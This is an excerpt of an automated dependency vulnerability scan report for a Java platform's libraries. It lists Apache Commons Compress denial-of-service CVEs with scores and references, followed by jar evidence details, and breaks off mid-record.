- [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] commented on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [GitHub] [skywalking] wu-sheng opened a new pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [skywalking] 01/01: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [GitHub] [skywalking] hanahmily merged pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [skywalking] branch master updated: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 (#7400)
- CONFIRM - https://security.netapp.com/advisory/ntap-20211022-0001/
- MISC - https://commons.apache.org/proper/commons-compress/security-reports.html
- MISC - https://lists.apache.org/thread.html/r19ebfd71770ec0617a9ea180e321ef927b3fefb4c81ec5d1902d20ab%40%3Cuser.commons.apache.org%3E
- MISC - https://www.oracle.com/security-alerts/cpuapr2022.html
- MISC - https://www.oracle.com/security-alerts/cpujan2022.html
- MISC - https://www.oracle.com/security-alerts/cpuoct2021.html
- MLIST - [oss-security] 20210713 CVE-2021-35515: Apache Commons Compress 1.6 to 1.20 denial of service vulnerability
- N/A - N/A
- OSSINDEX - [CVE-2021-35515] CWE-834: Excessive Iteration
- OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35515
- OSSIndex - https://commons.apache.org/proper/commons-compress/security-reports.html
- OSSIndex - https://lists.apache.org/thread.html/rbaea15ddc5a7c0c6b66660f1d6403b28595e2561bb283eade7d7cd69@%3Cannounce.apache.org%3E
Vulnerable Software & Versions:
CVE-2021-35516
When reading a specially crafted 7Z archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' sevenz package.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
- [announce] 20210713 CVE-2021-35516: Apache Commons Compress 1.6 to 1.20 denial of service vulnerability
- [poi-dev] 20210923 Re: [VOTE] Apache POI 5.1.0 release (RC1)
- [pulsar-commits] 20210716 [GitHub] [pulsar] lhotari opened a new pull request #11345: [Security] Upgrade commons-compress to 1.21
- [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] commented on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [GitHub] [skywalking] wu-sheng opened a new pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [skywalking] 01/01: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [GitHub] [skywalking] hanahmily merged pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [skywalking] branch master updated: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 (#7400)
CONFIRM - https://security.netapp.com/advisory/ntap-20211022-0001/
MISC - https://commons.apache.org/proper/commons-compress/security-reports.html
MISC - https://lists.apache.org/thread.html/rf68442d67eb166f4b6cf0bbbe6c7f99098c12954f37332073c9822ca%40%3Cuser.commons.apache.org%3E
MISC - https://www.oracle.com/security-alerts/cpuapr2022.html
MISC - https://www.oracle.com/security-alerts/cpujan2022.html
MISC - https://www.oracle.com/security-alerts/cpuoct2021.html
MLIST - [oss-security] 20210713 CVE-2021-35516: Apache Commons Compress 1.6 to 1.20 denial of service vulnerability
N/A - N/A
OSSINDEX - [CVE-2021-35516] CWE-130: Improper Handling of Length Parameter Inconsistency
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35516
OSSIndex - https://commons.apache.org/proper/commons-compress/security-reports.html
OSSIndex - https://issues.apache.org/jira/browse/COMPRESS-542
Vulnerable Software & Versions:
CVE-2021-35517
When reading a specially crafted TAR archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' tar package.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
- [announce] 20210713 CVE-2021-35517: Apache Commons Compress 1.1 to 1.20 denial of service vulnerability
- [announce] 20210713 CVE-2021-36373: Apache Ant TAR archive denial of service vulnerability
- [ant-user] 20210713 CVE-2021-36373: Apache Ant TAR archive denial of service vulnerability
- [flink-issues] 20210908 [GitHub] [flink] MartijnVisser opened a new pull request #17194: [FLINK-24034] Upgrade commons-compress to 1.21 and other apache.commons updates
- [poi-dev] 20210923 Re: [VOTE] Apache POI 5.1.0 release (RC1)
- [pulsar-commits] 20210716 [GitHub] [pulsar] lhotari opened a new pull request #11345: [Security] Upgrade commons-compress to 1.21
- [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] commented on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [GitHub] [skywalking] wu-sheng opened a new pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [skywalking] 01/01: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [GitHub] [skywalking] hanahmily merged pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [skywalking] branch master updated: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 (#7400)
CONFIRM - https://security.netapp.com/advisory/ntap-20211022-0001/
MISC - https://commons.apache.org/proper/commons-compress/security-reports.html
MISC - https://lists.apache.org/thread.html/r605d906b710b95f1bbe0036a53ac6968f667f2c249b6fbabada9a940%40%3Cuser.commons.apache.org%3E
MISC - https://www.oracle.com/security-alerts/cpuapr2022.html
MISC - https://www.oracle.com/security-alerts/cpujan2022.html
MISC - https://www.oracle.com/security-alerts/cpuoct2021.html
MLIST - [oss-security] 20210713 CVE-2021-35517: Apache Commons Compress 1.1 to 1.20 denial of service vulnerability
MLIST - [oss-security] 20210713 CVE-2021-36373: Apache Ant TAR archive denial of service vulnerability
N/A - N/A
OSSINDEX - [CVE-2021-35517] CWE-130: Improper Handling of Length Parameter Inconsistency
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35517
OSSIndex - https://github.com/OpenLiberty/open-liberty/issues/18808
OSSIndex - https://github.com/OpenLiberty/open-liberty/pull/17872
OSSIndex - https://lists.apache.org/thread.html/ra393ffdc7c90a4a37ea023946f390285693795013a642d80fba20203@%3Cannounce.apache.org%3E
OSSIndex - https://openliberty.io/docs/latest/security-vulnerabilities.html
Vulnerable Software & Versions:
CVE-2021-36090
When reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.
NVD-CWE-Other
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
- [announce] 20210713 CVE-2021-36090: Apache Commons Compress 1.0 to 1.20 denial of service vulnerability
- [announce] 20210713 CVE-2021-36374: Apache Ant ZIP, and ZIP based, archive denial of service vulerability
- [ant-user] 20210713 CVE-2021-36374: Apache Ant ZIP, and ZIP based, archive denial of service vulerability
- [drill-commits] 20210804 [drill] branch master updated: Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090
- [drill-dev] 20210803 [jira] [Created] (DRILL-7981) Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090
- [drill-dev] 20210804 [GitHub] [drill] luocooong merged pull request #2285: DRILL-7981: Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090
- [drill-dev] 20210804 [GitHub] [drill] luocooong opened a new pull request #2285: Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090
- [drill-dev] 20210805 [GitHub] [drill] luocooong merged pull request #2285: DRILL-7981: Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090
- [drill-issues] 20210803 [jira] [Created] (DRILL-7981) Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090
- [drill-issues] 20210804 [jira] [Commented] (DRILL-7981) Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090
- [drill-issues] 20210805 [jira] [Commented] (DRILL-7981) Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090
- [druid-commits] 20210726 [GitHub] [druid] suneet-s merged pull request #11496: Address CVE-2021-35515 CVE-2021-36090
- [druid-commits] 20210726 [GitHub] [druid] suneet-s opened a new pull request #11496: Address CVE-2021-35515 CVE-2021-36090
- [druid-commits] 20210726 [druid] branch master updated: Address CVE-2021-35515 CVE-2021-36090 (#11496)
- [james-notifications] 20210714 [GitHub] [james-project] chibenwa opened a new pull request #537: [UPGRADE] Security upgrade: common-compress to 1.21
- [poi-dev] 20210923 Re: [VOTE] Apache POI 5.1.0 release (RC1)
- [pulsar-commits] 20210716 [GitHub] [pulsar] lhotari opened a new pull request #11345: [Security] Upgrade commons-compress to 1.21
- [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] commented on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [GitHub] [skywalking] wu-sheng opened a new pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210802 [skywalking] 01/01: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [GitHub] [skywalking] hanahmily merged pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090
- [skywalking-notifications] 20210803 [skywalking] branch master updated: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 (#7400)
- [tomcat-dev] 20210811 [GitHub] [tomcat-jakartaee-migration] ebourg commented on issue #23: Vulnerability with Apache Commons Compress v1.20
CONFIRM - https://security.netapp.com/advisory/ntap-20211022-0001/
MISC - https://commons.apache.org/proper/commons-compress/security-reports.html
MISC - https://lists.apache.org/thread.html/rc4134026d7d7b053d4f9f2205531122732405012c8804fd850a9b26f%40%3Cuser.commons.apache.org%3E
MISC - https://www.oracle.com/security-alerts/cpuapr2022.html
MISC - https://www.oracle.com/security-alerts/cpujan2022.html
MISC - https://www.oracle.com/security-alerts/cpuoct2021.html
MLIST - [oss-security] 20210713 CVE-2021-36090: Apache Commons Compress 1.0 to 1.20 denial of service vulnerability
MLIST - [oss-security] 20210713 CVE-2021-36374: Apache Ant ZIP, and ZIP based, archive denial of service vulerability
N/A - N/A
OSSINDEX - [CVE-2021-36090] CWE-130: Improper Handling of Length Parameter Inconsistency
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36090
OSSIndex - https://commons.apache.org/proper/commons-compress/security-reports.html
OSSIndex - https://github.com/OpenLiberty/open-liberty/issues/18808
OSSIndex - https://github.com/OpenLiberty/open-liberty/pull/17872
OSSIndex - https://lists.apache.org/thread.html/r0e87177f8e78b4ee453cd4d3d8f4ddec6f10d2c27707dd71e12cafc9@%3Cannounce.apache.org%3E
OSSIndex - https://openliberty.io/docs/latest/security-vulnerabilities.html
Vulnerable Software & Versions:
commons-csv-1.7.jar
Description: The Apache Commons CSV library provides a simple interface for reading and writing CSV files of various types.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-csv/1.7/commons-csv-1.7.jar
MD5: 2565c6a73ddefd0ceb9e130063f9e51e
SHA1: cb5d05520f8fe1b409aaf29962e47dc5764f8f39
SHA256: 25f5e7914729a3cb9cbb83918b5f1116625cca63ce38a50f0fe596f837b9a524
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type / Source Name: Value (Confidence)):
Vendor
- file name: commons-csv (High)
- jar package name: apache, commons, csv (Highest)
- Manifest bundle-docurl: http://commons.apache.org/proper/commons-csv/ (Low)
- Manifest bundle-symbolicname: org.apache.commons.commons-csv (Medium)
- Manifest implementation-build: release@ra227a1e2fb61ff5f192cfd8099e7e6f4848d7d43; 2019-06-02 00:13:43+0000 (Low)
- Manifest implementation-url: http://commons.apache.org/proper/commons-csv/ (Low)
- Manifest Implementation-Vendor: The Apache Software Foundation (High)
- Manifest Implementation-Vendor-Id: org.apache (Medium)
- Manifest require-capability: osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" (Low)
- Manifest specification-vendor: The Apache Software Foundation (Low)
- pom artifactid: commons-csv (Highest); commons-csv (Low)
- pom developer email: bayard@apache.org, britter@apache.org, chtompki@apache.org, ebourg@apache.org, ggregory@apache.org, mvdb@apache.org, yonik@apache.org (Low)
- pom developer id: bayard, britter, chtompki, ebourg, ggregory, mvdb, yonik (Medium)
- pom developer name: Benedikt Ritter, Emmanuel Bourg, Gary Gregory, Henri Yandell, Martin van den Bemt, Rob Tompkins, Yonik Seeley (Medium)
- pom developer org: Apache; The Apache Software Foundation (Medium)
- pom groupid: org.apache.commons (Highest)
- pom name: Apache Commons CSV (High)
- pom parent-artifactid: commons-parent (Low)
- pom url: http://commons.apache.org/proper/commons-csv/ (Highest)
Product
- file name: commons-csv (High)
- jar package name: apache, commons, csv (Highest)
- Manifest bundle-docurl: http://commons.apache.org/proper/commons-csv/ (Low)
- Manifest Bundle-Name: Apache Commons CSV (Medium)
- Manifest bundle-symbolicname: org.apache.commons.commons-csv (Medium)
- Manifest implementation-build: release@ra227a1e2fb61ff5f192cfd8099e7e6f4848d7d43; 2019-06-02 00:13:43+0000 (Low)
- Manifest Implementation-Title: Apache Commons CSV (High)
- Manifest implementation-url: http://commons.apache.org/proper/commons-csv/ (Low)
- Manifest require-capability: osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" (Low)
- Manifest specification-title: Apache Commons CSV (Medium)
- pom artifactid: commons-csv (Highest)
- pom developer email: bayard@apache.org, britter@apache.org, chtompki@apache.org, ebourg@apache.org, ggregory@apache.org, mvdb@apache.org, yonik@apache.org (Low)
- pom developer id: bayard, britter, chtompki, ebourg, ggregory, mvdb, yonik (Low)
- pom developer name: Benedikt Ritter, Emmanuel Bourg, Gary Gregory, Henri Yandell, Martin van den Bemt, Rob Tompkins, Yonik Seeley (Low)
- pom developer org: Apache; The Apache Software Foundation (Low)
- pom groupid: org.apache.commons (Highest)
- pom name: Apache Commons CSV (High)
- pom parent-artifactid: commons-parent (Medium)
- pom url: http://commons.apache.org/proper/commons-csv/ (Medium)
Version
- file version: 1.7 (High)
- Manifest Implementation-Version: 1.7 (High)
- pom parent-version: 1.7 (Low)
- pom version: 1.7 (Highest)
commons-discovery-0.5.jar
Description: The Apache Commons Discovery component is about discovering, or finding, implementations for pluggable interfaces.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/commons-discovery/commons-discovery/0.5/commons-discovery-0.5.jar
MD5: b35120680c3a22cec7a037fce196cd97
SHA1: 3a8ac816bbe02d2f88523ef22cbf2c4abd71d6a8
SHA256: e5b7d58ae62e5b309d5c0ffa5a5b1d9d1e0f0c4c3cc18d1fe3103fd29f90149d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type / Source Name: Value (Confidence)):
Vendor
- file name: commons-discovery (High)
- jar package name: apache, commons, discovery (Highest)
- Manifest bundle-docurl: http://commons.apache.org/discovery/ (Low)
- Manifest bundle-symbolicname: org.apache.commons.discovery (Medium)
- Manifest Implementation-Vendor: The Apache Software Foundation (High)
- Manifest Implementation-Vendor-Id: org.apache (Medium)
- Manifest specification-vendor: The Apache Software Foundation (Low)
- pom artifactid: commons-discovery (Highest); commons-discovery (Low)
- pom developer email: dims@apache.org, jstrachan@apache.org, matth@apache.org, rdonkin@apache.org, rwinston@eircom.net, simonetripodi@apache.org (Low)
- pom developer id: costin, craigmcc, dims, jstrachan, matth, rdonkin, rsitze, rwinston, simonetripodi (Medium)
- pom developer name: Costin Manolache, Craig R. McClanahan, Davanum Srinivas, James Strachan, Matthew Hawthorne, Richard Sitze, Robert Burrell Donkin, Rory Winston, Simone Tripodi (Medium)
- pom developer org: SpiritSoft, Inc. (Medium)
- pom groupid: commons-discovery (Highest)
- pom name: Commons Discovery (High)
- pom parent-artifactid: commons-parent (Low)
- pom parent-groupid: org.apache.commons (Medium)
- pom url: http://commons.apache.org/discovery/ (Highest)
Product
- file name: commons-discovery (High)
- jar package name: apache, commons, discovery (Highest)
- Manifest bundle-docurl: http://commons.apache.org/discovery/ (Low)
- Manifest Bundle-Name: Commons Discovery (Medium)
- Manifest bundle-symbolicname: org.apache.commons.discovery (Medium)
- Manifest Implementation-Title: Commons Discovery (High)
- Manifest specification-title: Commons Discovery (Medium)
- pom artifactid: commons-discovery (Highest)
- pom developer email: dims@apache.org, jstrachan@apache.org, matth@apache.org, rdonkin@apache.org, rwinston@eircom.net, simonetripodi@apache.org (Low)
- pom developer id: costin, craigmcc, dims, jstrachan, matth, rdonkin, rsitze, rwinston, simonetripodi (Low)
- pom developer name: Costin Manolache, Craig R. McClanahan, Davanum Srinivas, James Strachan, Matthew Hawthorne, Richard Sitze, Robert Burrell Donkin, Rory Winston, Simone Tripodi (Low)
- pom developer org: SpiritSoft, Inc. (Low)
- pom groupid: commons-discovery (Highest)
- pom name: Commons Discovery (High)
- pom parent-artifactid: commons-parent (Medium)
- pom parent-groupid: org.apache.commons (Medium)
- pom url: http://commons.apache.org/discovery/ (Medium)
Version
- file version: 0.5 (High)
- Manifest Bundle-Version: 0.5 (High)
- Manifest Implementation-Version: 0.5 (High)
- pom parent-version: 0.5 (Low)
- pom version: 0.5 (Highest)
CVE-2022-0869
Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3.
CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv2: Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N
CVSSv3: Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
References:
Vulnerable Software & Versions:
commons-email-1.5.jar
Description: Apache Commons Email aims to provide an API for sending email. It is built on top of the JavaMail API, which it aims to simplify.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-email/1.5/commons-email-1.5.jar
MD5: e72657496d31f152aa26d4122e0850d9
SHA1: e8e677c6362eba14ff3c476ba63ccb83132dbd52
SHA256: ee8479906abb2c355a46a0a9845cfa1803bcc3c520a34baea4a6cf4e1f0f0cc1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type / Source Name: Value (Confidence)):
Vendor
- file name: commons-email (High)
- jar package name: apache, commons, email (Highest)
- Manifest bundle-docurl: http://commons.apache.org/proper/commons-email/ (Low)
- Manifest bundle-symbolicname: org.apache.commons.email (Medium)
- Manifest implementation-build: trunk@r1803365; 2017-07-29 15:56:23+0200 (Low)
- Manifest implementation-url: http://commons.apache.org/proper/commons-email/ (Low)
- Manifest Implementation-Vendor: The Apache Software Foundation (High)
- Manifest Implementation-Vendor-Id: org.apache (Medium)
- Manifest require-capability: osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" (Low)
- Manifest specification-vendor: The Apache Software Foundation (Low)
- pom artifactid: commons-email (Highest); commons-email (Low)
- pom developer email: bspeakmon@apache.org, dion@apache.org, dlr@finemaltcoding.com, epugh@opensourceconnections.com, ggregory@apache.org, hps@intermeta.de, jason@zenplex.com, jmcnally@collab.net, Joe@Germuska.com, jon@latchkey.com, quintonm@bellsouth.net, rdonkin@apache.org, sgoeschl@apache.org, tn@apache.org (Low)
- pom developer id: bspeakmon, dion, dlr, epugh, germuska, ggregory, henning, jmcnally, jon, jvanzyl, quintonm, rdonkin, scolebourne, sgoeschl, tn (Medium)
- pom developer name: Ben Speakmon, Daniel Rall, dIon Gillard, Eric Pugh, Gary Gregory, Henning P. Schmiedehausen, Jason van Zyl, Joe Germuska, John McNally, Jon Scott Stevens, Quinton McCombs, Robert Burrell Donkin, Siegfried Goeschl, Stephen Colebourne, Thomas Neidhart (Medium)
- pom developer org: CollabNet, Inc.; INTERMETA - Gesellschaft fuer Mehrwertdienste mbH; NequalsOne, LLC.; OpenSource Connections; The Apache Software Foundation; Zenplex (Medium)
- pom groupid: org.apache.commons (Highest)
- pom name: Apache Commons Email (High)
- pom parent-artifactid: commons-parent (Low)
- pom url: http://commons.apache.org/proper/commons-email/ (Highest)
Product
- file name: commons-email (High)
- jar package name: apache, commons, email (Highest)
- Manifest bundle-docurl: http://commons.apache.org/proper/commons-email/ (Low)
- Manifest Bundle-Name: Apache Commons Email (Medium)
- Manifest bundle-symbolicname: org.apache.commons.email (Medium)
- Manifest implementation-build: trunk@r1803365; 2017-07-29 15:56:23+0200 (Low)
- Manifest Implementation-Title: Apache Commons Email (High)
- Manifest implementation-url: http://commons.apache.org/proper/commons-email/ (Low)
- Manifest require-capability: osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" (Low)
- Manifest specification-title: Apache Commons Email (Medium)
- pom artifactid: commons-email (Highest)
- pom developer email: bspeakmon@apache.org, dion@apache.org, dlr@finemaltcoding.com, epugh@opensourceconnections.com, ggregory@apache.org, hps@intermeta.de, jason@zenplex.com, jmcnally@collab.net, Joe@Germuska.com, jon@latchkey.com, quintonm@bellsouth.net, rdonkin@apache.org, sgoeschl@apache.org, tn@apache.org (Low)
- pom developer id: bspeakmon, dion, dlr, epugh, germuska, ggregory, henning, jmcnally, jon, jvanzyl, quintonm, rdonkin, scolebourne, sgoeschl, tn (Low)
- pom developer name: Ben Speakmon, Daniel Rall, dIon Gillard, Eric Pugh, Gary Gregory, Henning P. Schmiedehausen, Jason van Zyl, Joe Germuska, John McNally, Jon Scott Stevens, Quinton McCombs, Robert Burrell Donkin, Siegfried Goeschl, Stephen Colebourne, Thomas Neidhart (Low)
- pom developer org: CollabNet, Inc.; INTERMETA - Gesellschaft fuer Mehrwertdienste mbH; NequalsOne, LLC.; OpenSource Connections; The Apache Software Foundation; Zenplex (Low)
- pom groupid: org.apache.commons (Highest)
- pom name: Apache Commons Email (High)
- pom parent-artifactid: commons-parent (Medium)
- pom url: http://commons.apache.org/proper/commons-email/ (Medium)
Version
- file version: 1.5 (High)
- Manifest Implementation-Version: 1.5 (High)
- pom parent-version: 1.5 (Low)
- pom version: 1.5 (Highest)
commons-exec-1.3.jar
Description: Apache Commons Exec is a library to reliably execute external processes from within the JVM.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-exec/1.3/commons-exec-1.3.jar
MD5: 8bb8fa2edfd60d5c7ed6bf9923d14aa8
SHA1: 8dfb9facd0830a27b1b5f29f84593f0aeee7773b
SHA256: cb49812dc1bfb0ea4f20f398bcae1a88c6406e213e67f7524fb10d4f8ad9347b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type / Source Name: Value (Confidence)):
Vendor
- file name: commons-exec (High)
- jar package name: apache, commons, exec (Highest)
- Manifest bundle-docurl: http://commons.apache.org/proper/commons-exec/ (Low)
- Manifest bundle-symbolicname: org.apache.commons.exec (Medium)
- Manifest implementation-build: trunk@r1636211; 2014-11-02 23:51:55+0000 (Low)
- Manifest Implementation-Vendor: The Apache Software Foundation (High)
- Manifest Implementation-Vendor-Id: org.apache (Medium)
- Manifest require-capability: osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" (Low)
- Manifest specification-vendor: The Apache Software Foundation (Low)
- pom artifactid: commons-exec (Highest); commons-exec (Low)
- pom developer email: ggregory@apache.org (Low)
- pom developer id: brett, ggregory, sebb, sgoeschl, trygvis (Medium)
- pom developer name: Brett Porter, Gary Gregory, Sebastian Bazley, Siegfried Goeschl, Trygve Laugstøl (Medium)
- pom developer org: Apache (Medium)
- pom groupid: org.apache.commons (Highest)
- pom name: Apache Commons Exec (High)
- pom parent-artifactid: commons-parent (Low)
- pom url: http://commons.apache.org/proper/commons-exec/ (Highest)
Product
- file name: commons-exec (High)
- jar package name: apache, commons, exec (Highest)
- Manifest bundle-docurl: http://commons.apache.org/proper/commons-exec/ (Low)
- Manifest Bundle-Name: Apache Commons Exec (Medium)
- Manifest bundle-symbolicname: org.apache.commons.exec (Medium)
- Manifest implementation-build: trunk@r1636211; 2014-11-02 23:51:55+0000 (Low)
- Manifest Implementation-Title: Apache Commons Exec (High)
- Manifest require-capability: osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" (Low)
- Manifest specification-title: Apache Commons Exec (Medium)
- pom artifactid: commons-exec (Highest)
- pom developer email: ggregory@apache.org (Low)
- pom developer id: brett, ggregory, sebb, sgoeschl, trygvis (Low)
- pom developer name: Brett Porter, Gary Gregory, Sebastian Bazley, Siegfried Goeschl, Trygve Laugstøl (Low)
- pom developer org: Apache (Low)
- pom groupid: org.apache.commons (Highest)
- pom name: Apache Commons Exec (High)
- pom parent-artifactid: commons-parent (Medium)
- pom url: http://commons.apache.org/proper/commons-exec/ (Medium)
Version
- file version: 1.3 (High)
- Manifest Implementation-Version: 1.3 (High)
- pom parent-version: 1.3 (Low)
- pom version: 1.3 (Highest)
commons-fileupload-1.4.jar
Description:
The Apache Commons FileUpload component provides a simple yet flexible means of adding support for multipart
file upload functionality to servlets and web applications.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/commons-fileupload/commons-fileupload/1.4/commons-fileupload-1.4.jar
MD5: 0c3b924dcaaa90c3fb93fe04ae96a35e
SHA1: f95188e3d372e20e7328706c37ef366e5d7859b0
SHA256: a4ec02336f49253ea50405698b79232b8c5cbf02cb60df3a674d77a749a1def7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-fileupload High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name fileupload Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-fileupload/ Low Vendor Manifest bundle-symbolicname org.apache.commons.commons-fileupload Medium Vendor Manifest implementation-build UNKNOWN@r047f31576411beee69cf75584ae76531cc9ac753; 2018-12-24 07:06:18+0000 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-fileupload/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-fileupload Highest Vendor pom artifactid commons-fileupload Low Vendor pom developer email chtompki@apache.org Low Vendor pom developer email dion@apache.org Low Vendor pom developer email dlr@finemaltcoding.com Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jason@zenplex.com Low Vendor pom developer email jmcnally@collab.net Low Vendor pom developer email jochen.wiedmann@gmail.com Low Vendor pom developer email martinc@apache.org Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email sean |at| seansullivan |dot| com Low Vendor pom developer email simonetripodi@apache.org Low Vendor pom developer id chtompki Medium Vendor pom developer id dion Medium Vendor pom developer id dlr Medium Vendor pom developer id ggregory Medium Vendor pom developer id jmcnally Medium Vendor pom developer id jochen Medium Vendor pom developer id jvanzyl Medium Vendor pom developer id martinc Medium Vendor pom developer id rdonkin Medium Vendor pom developer id 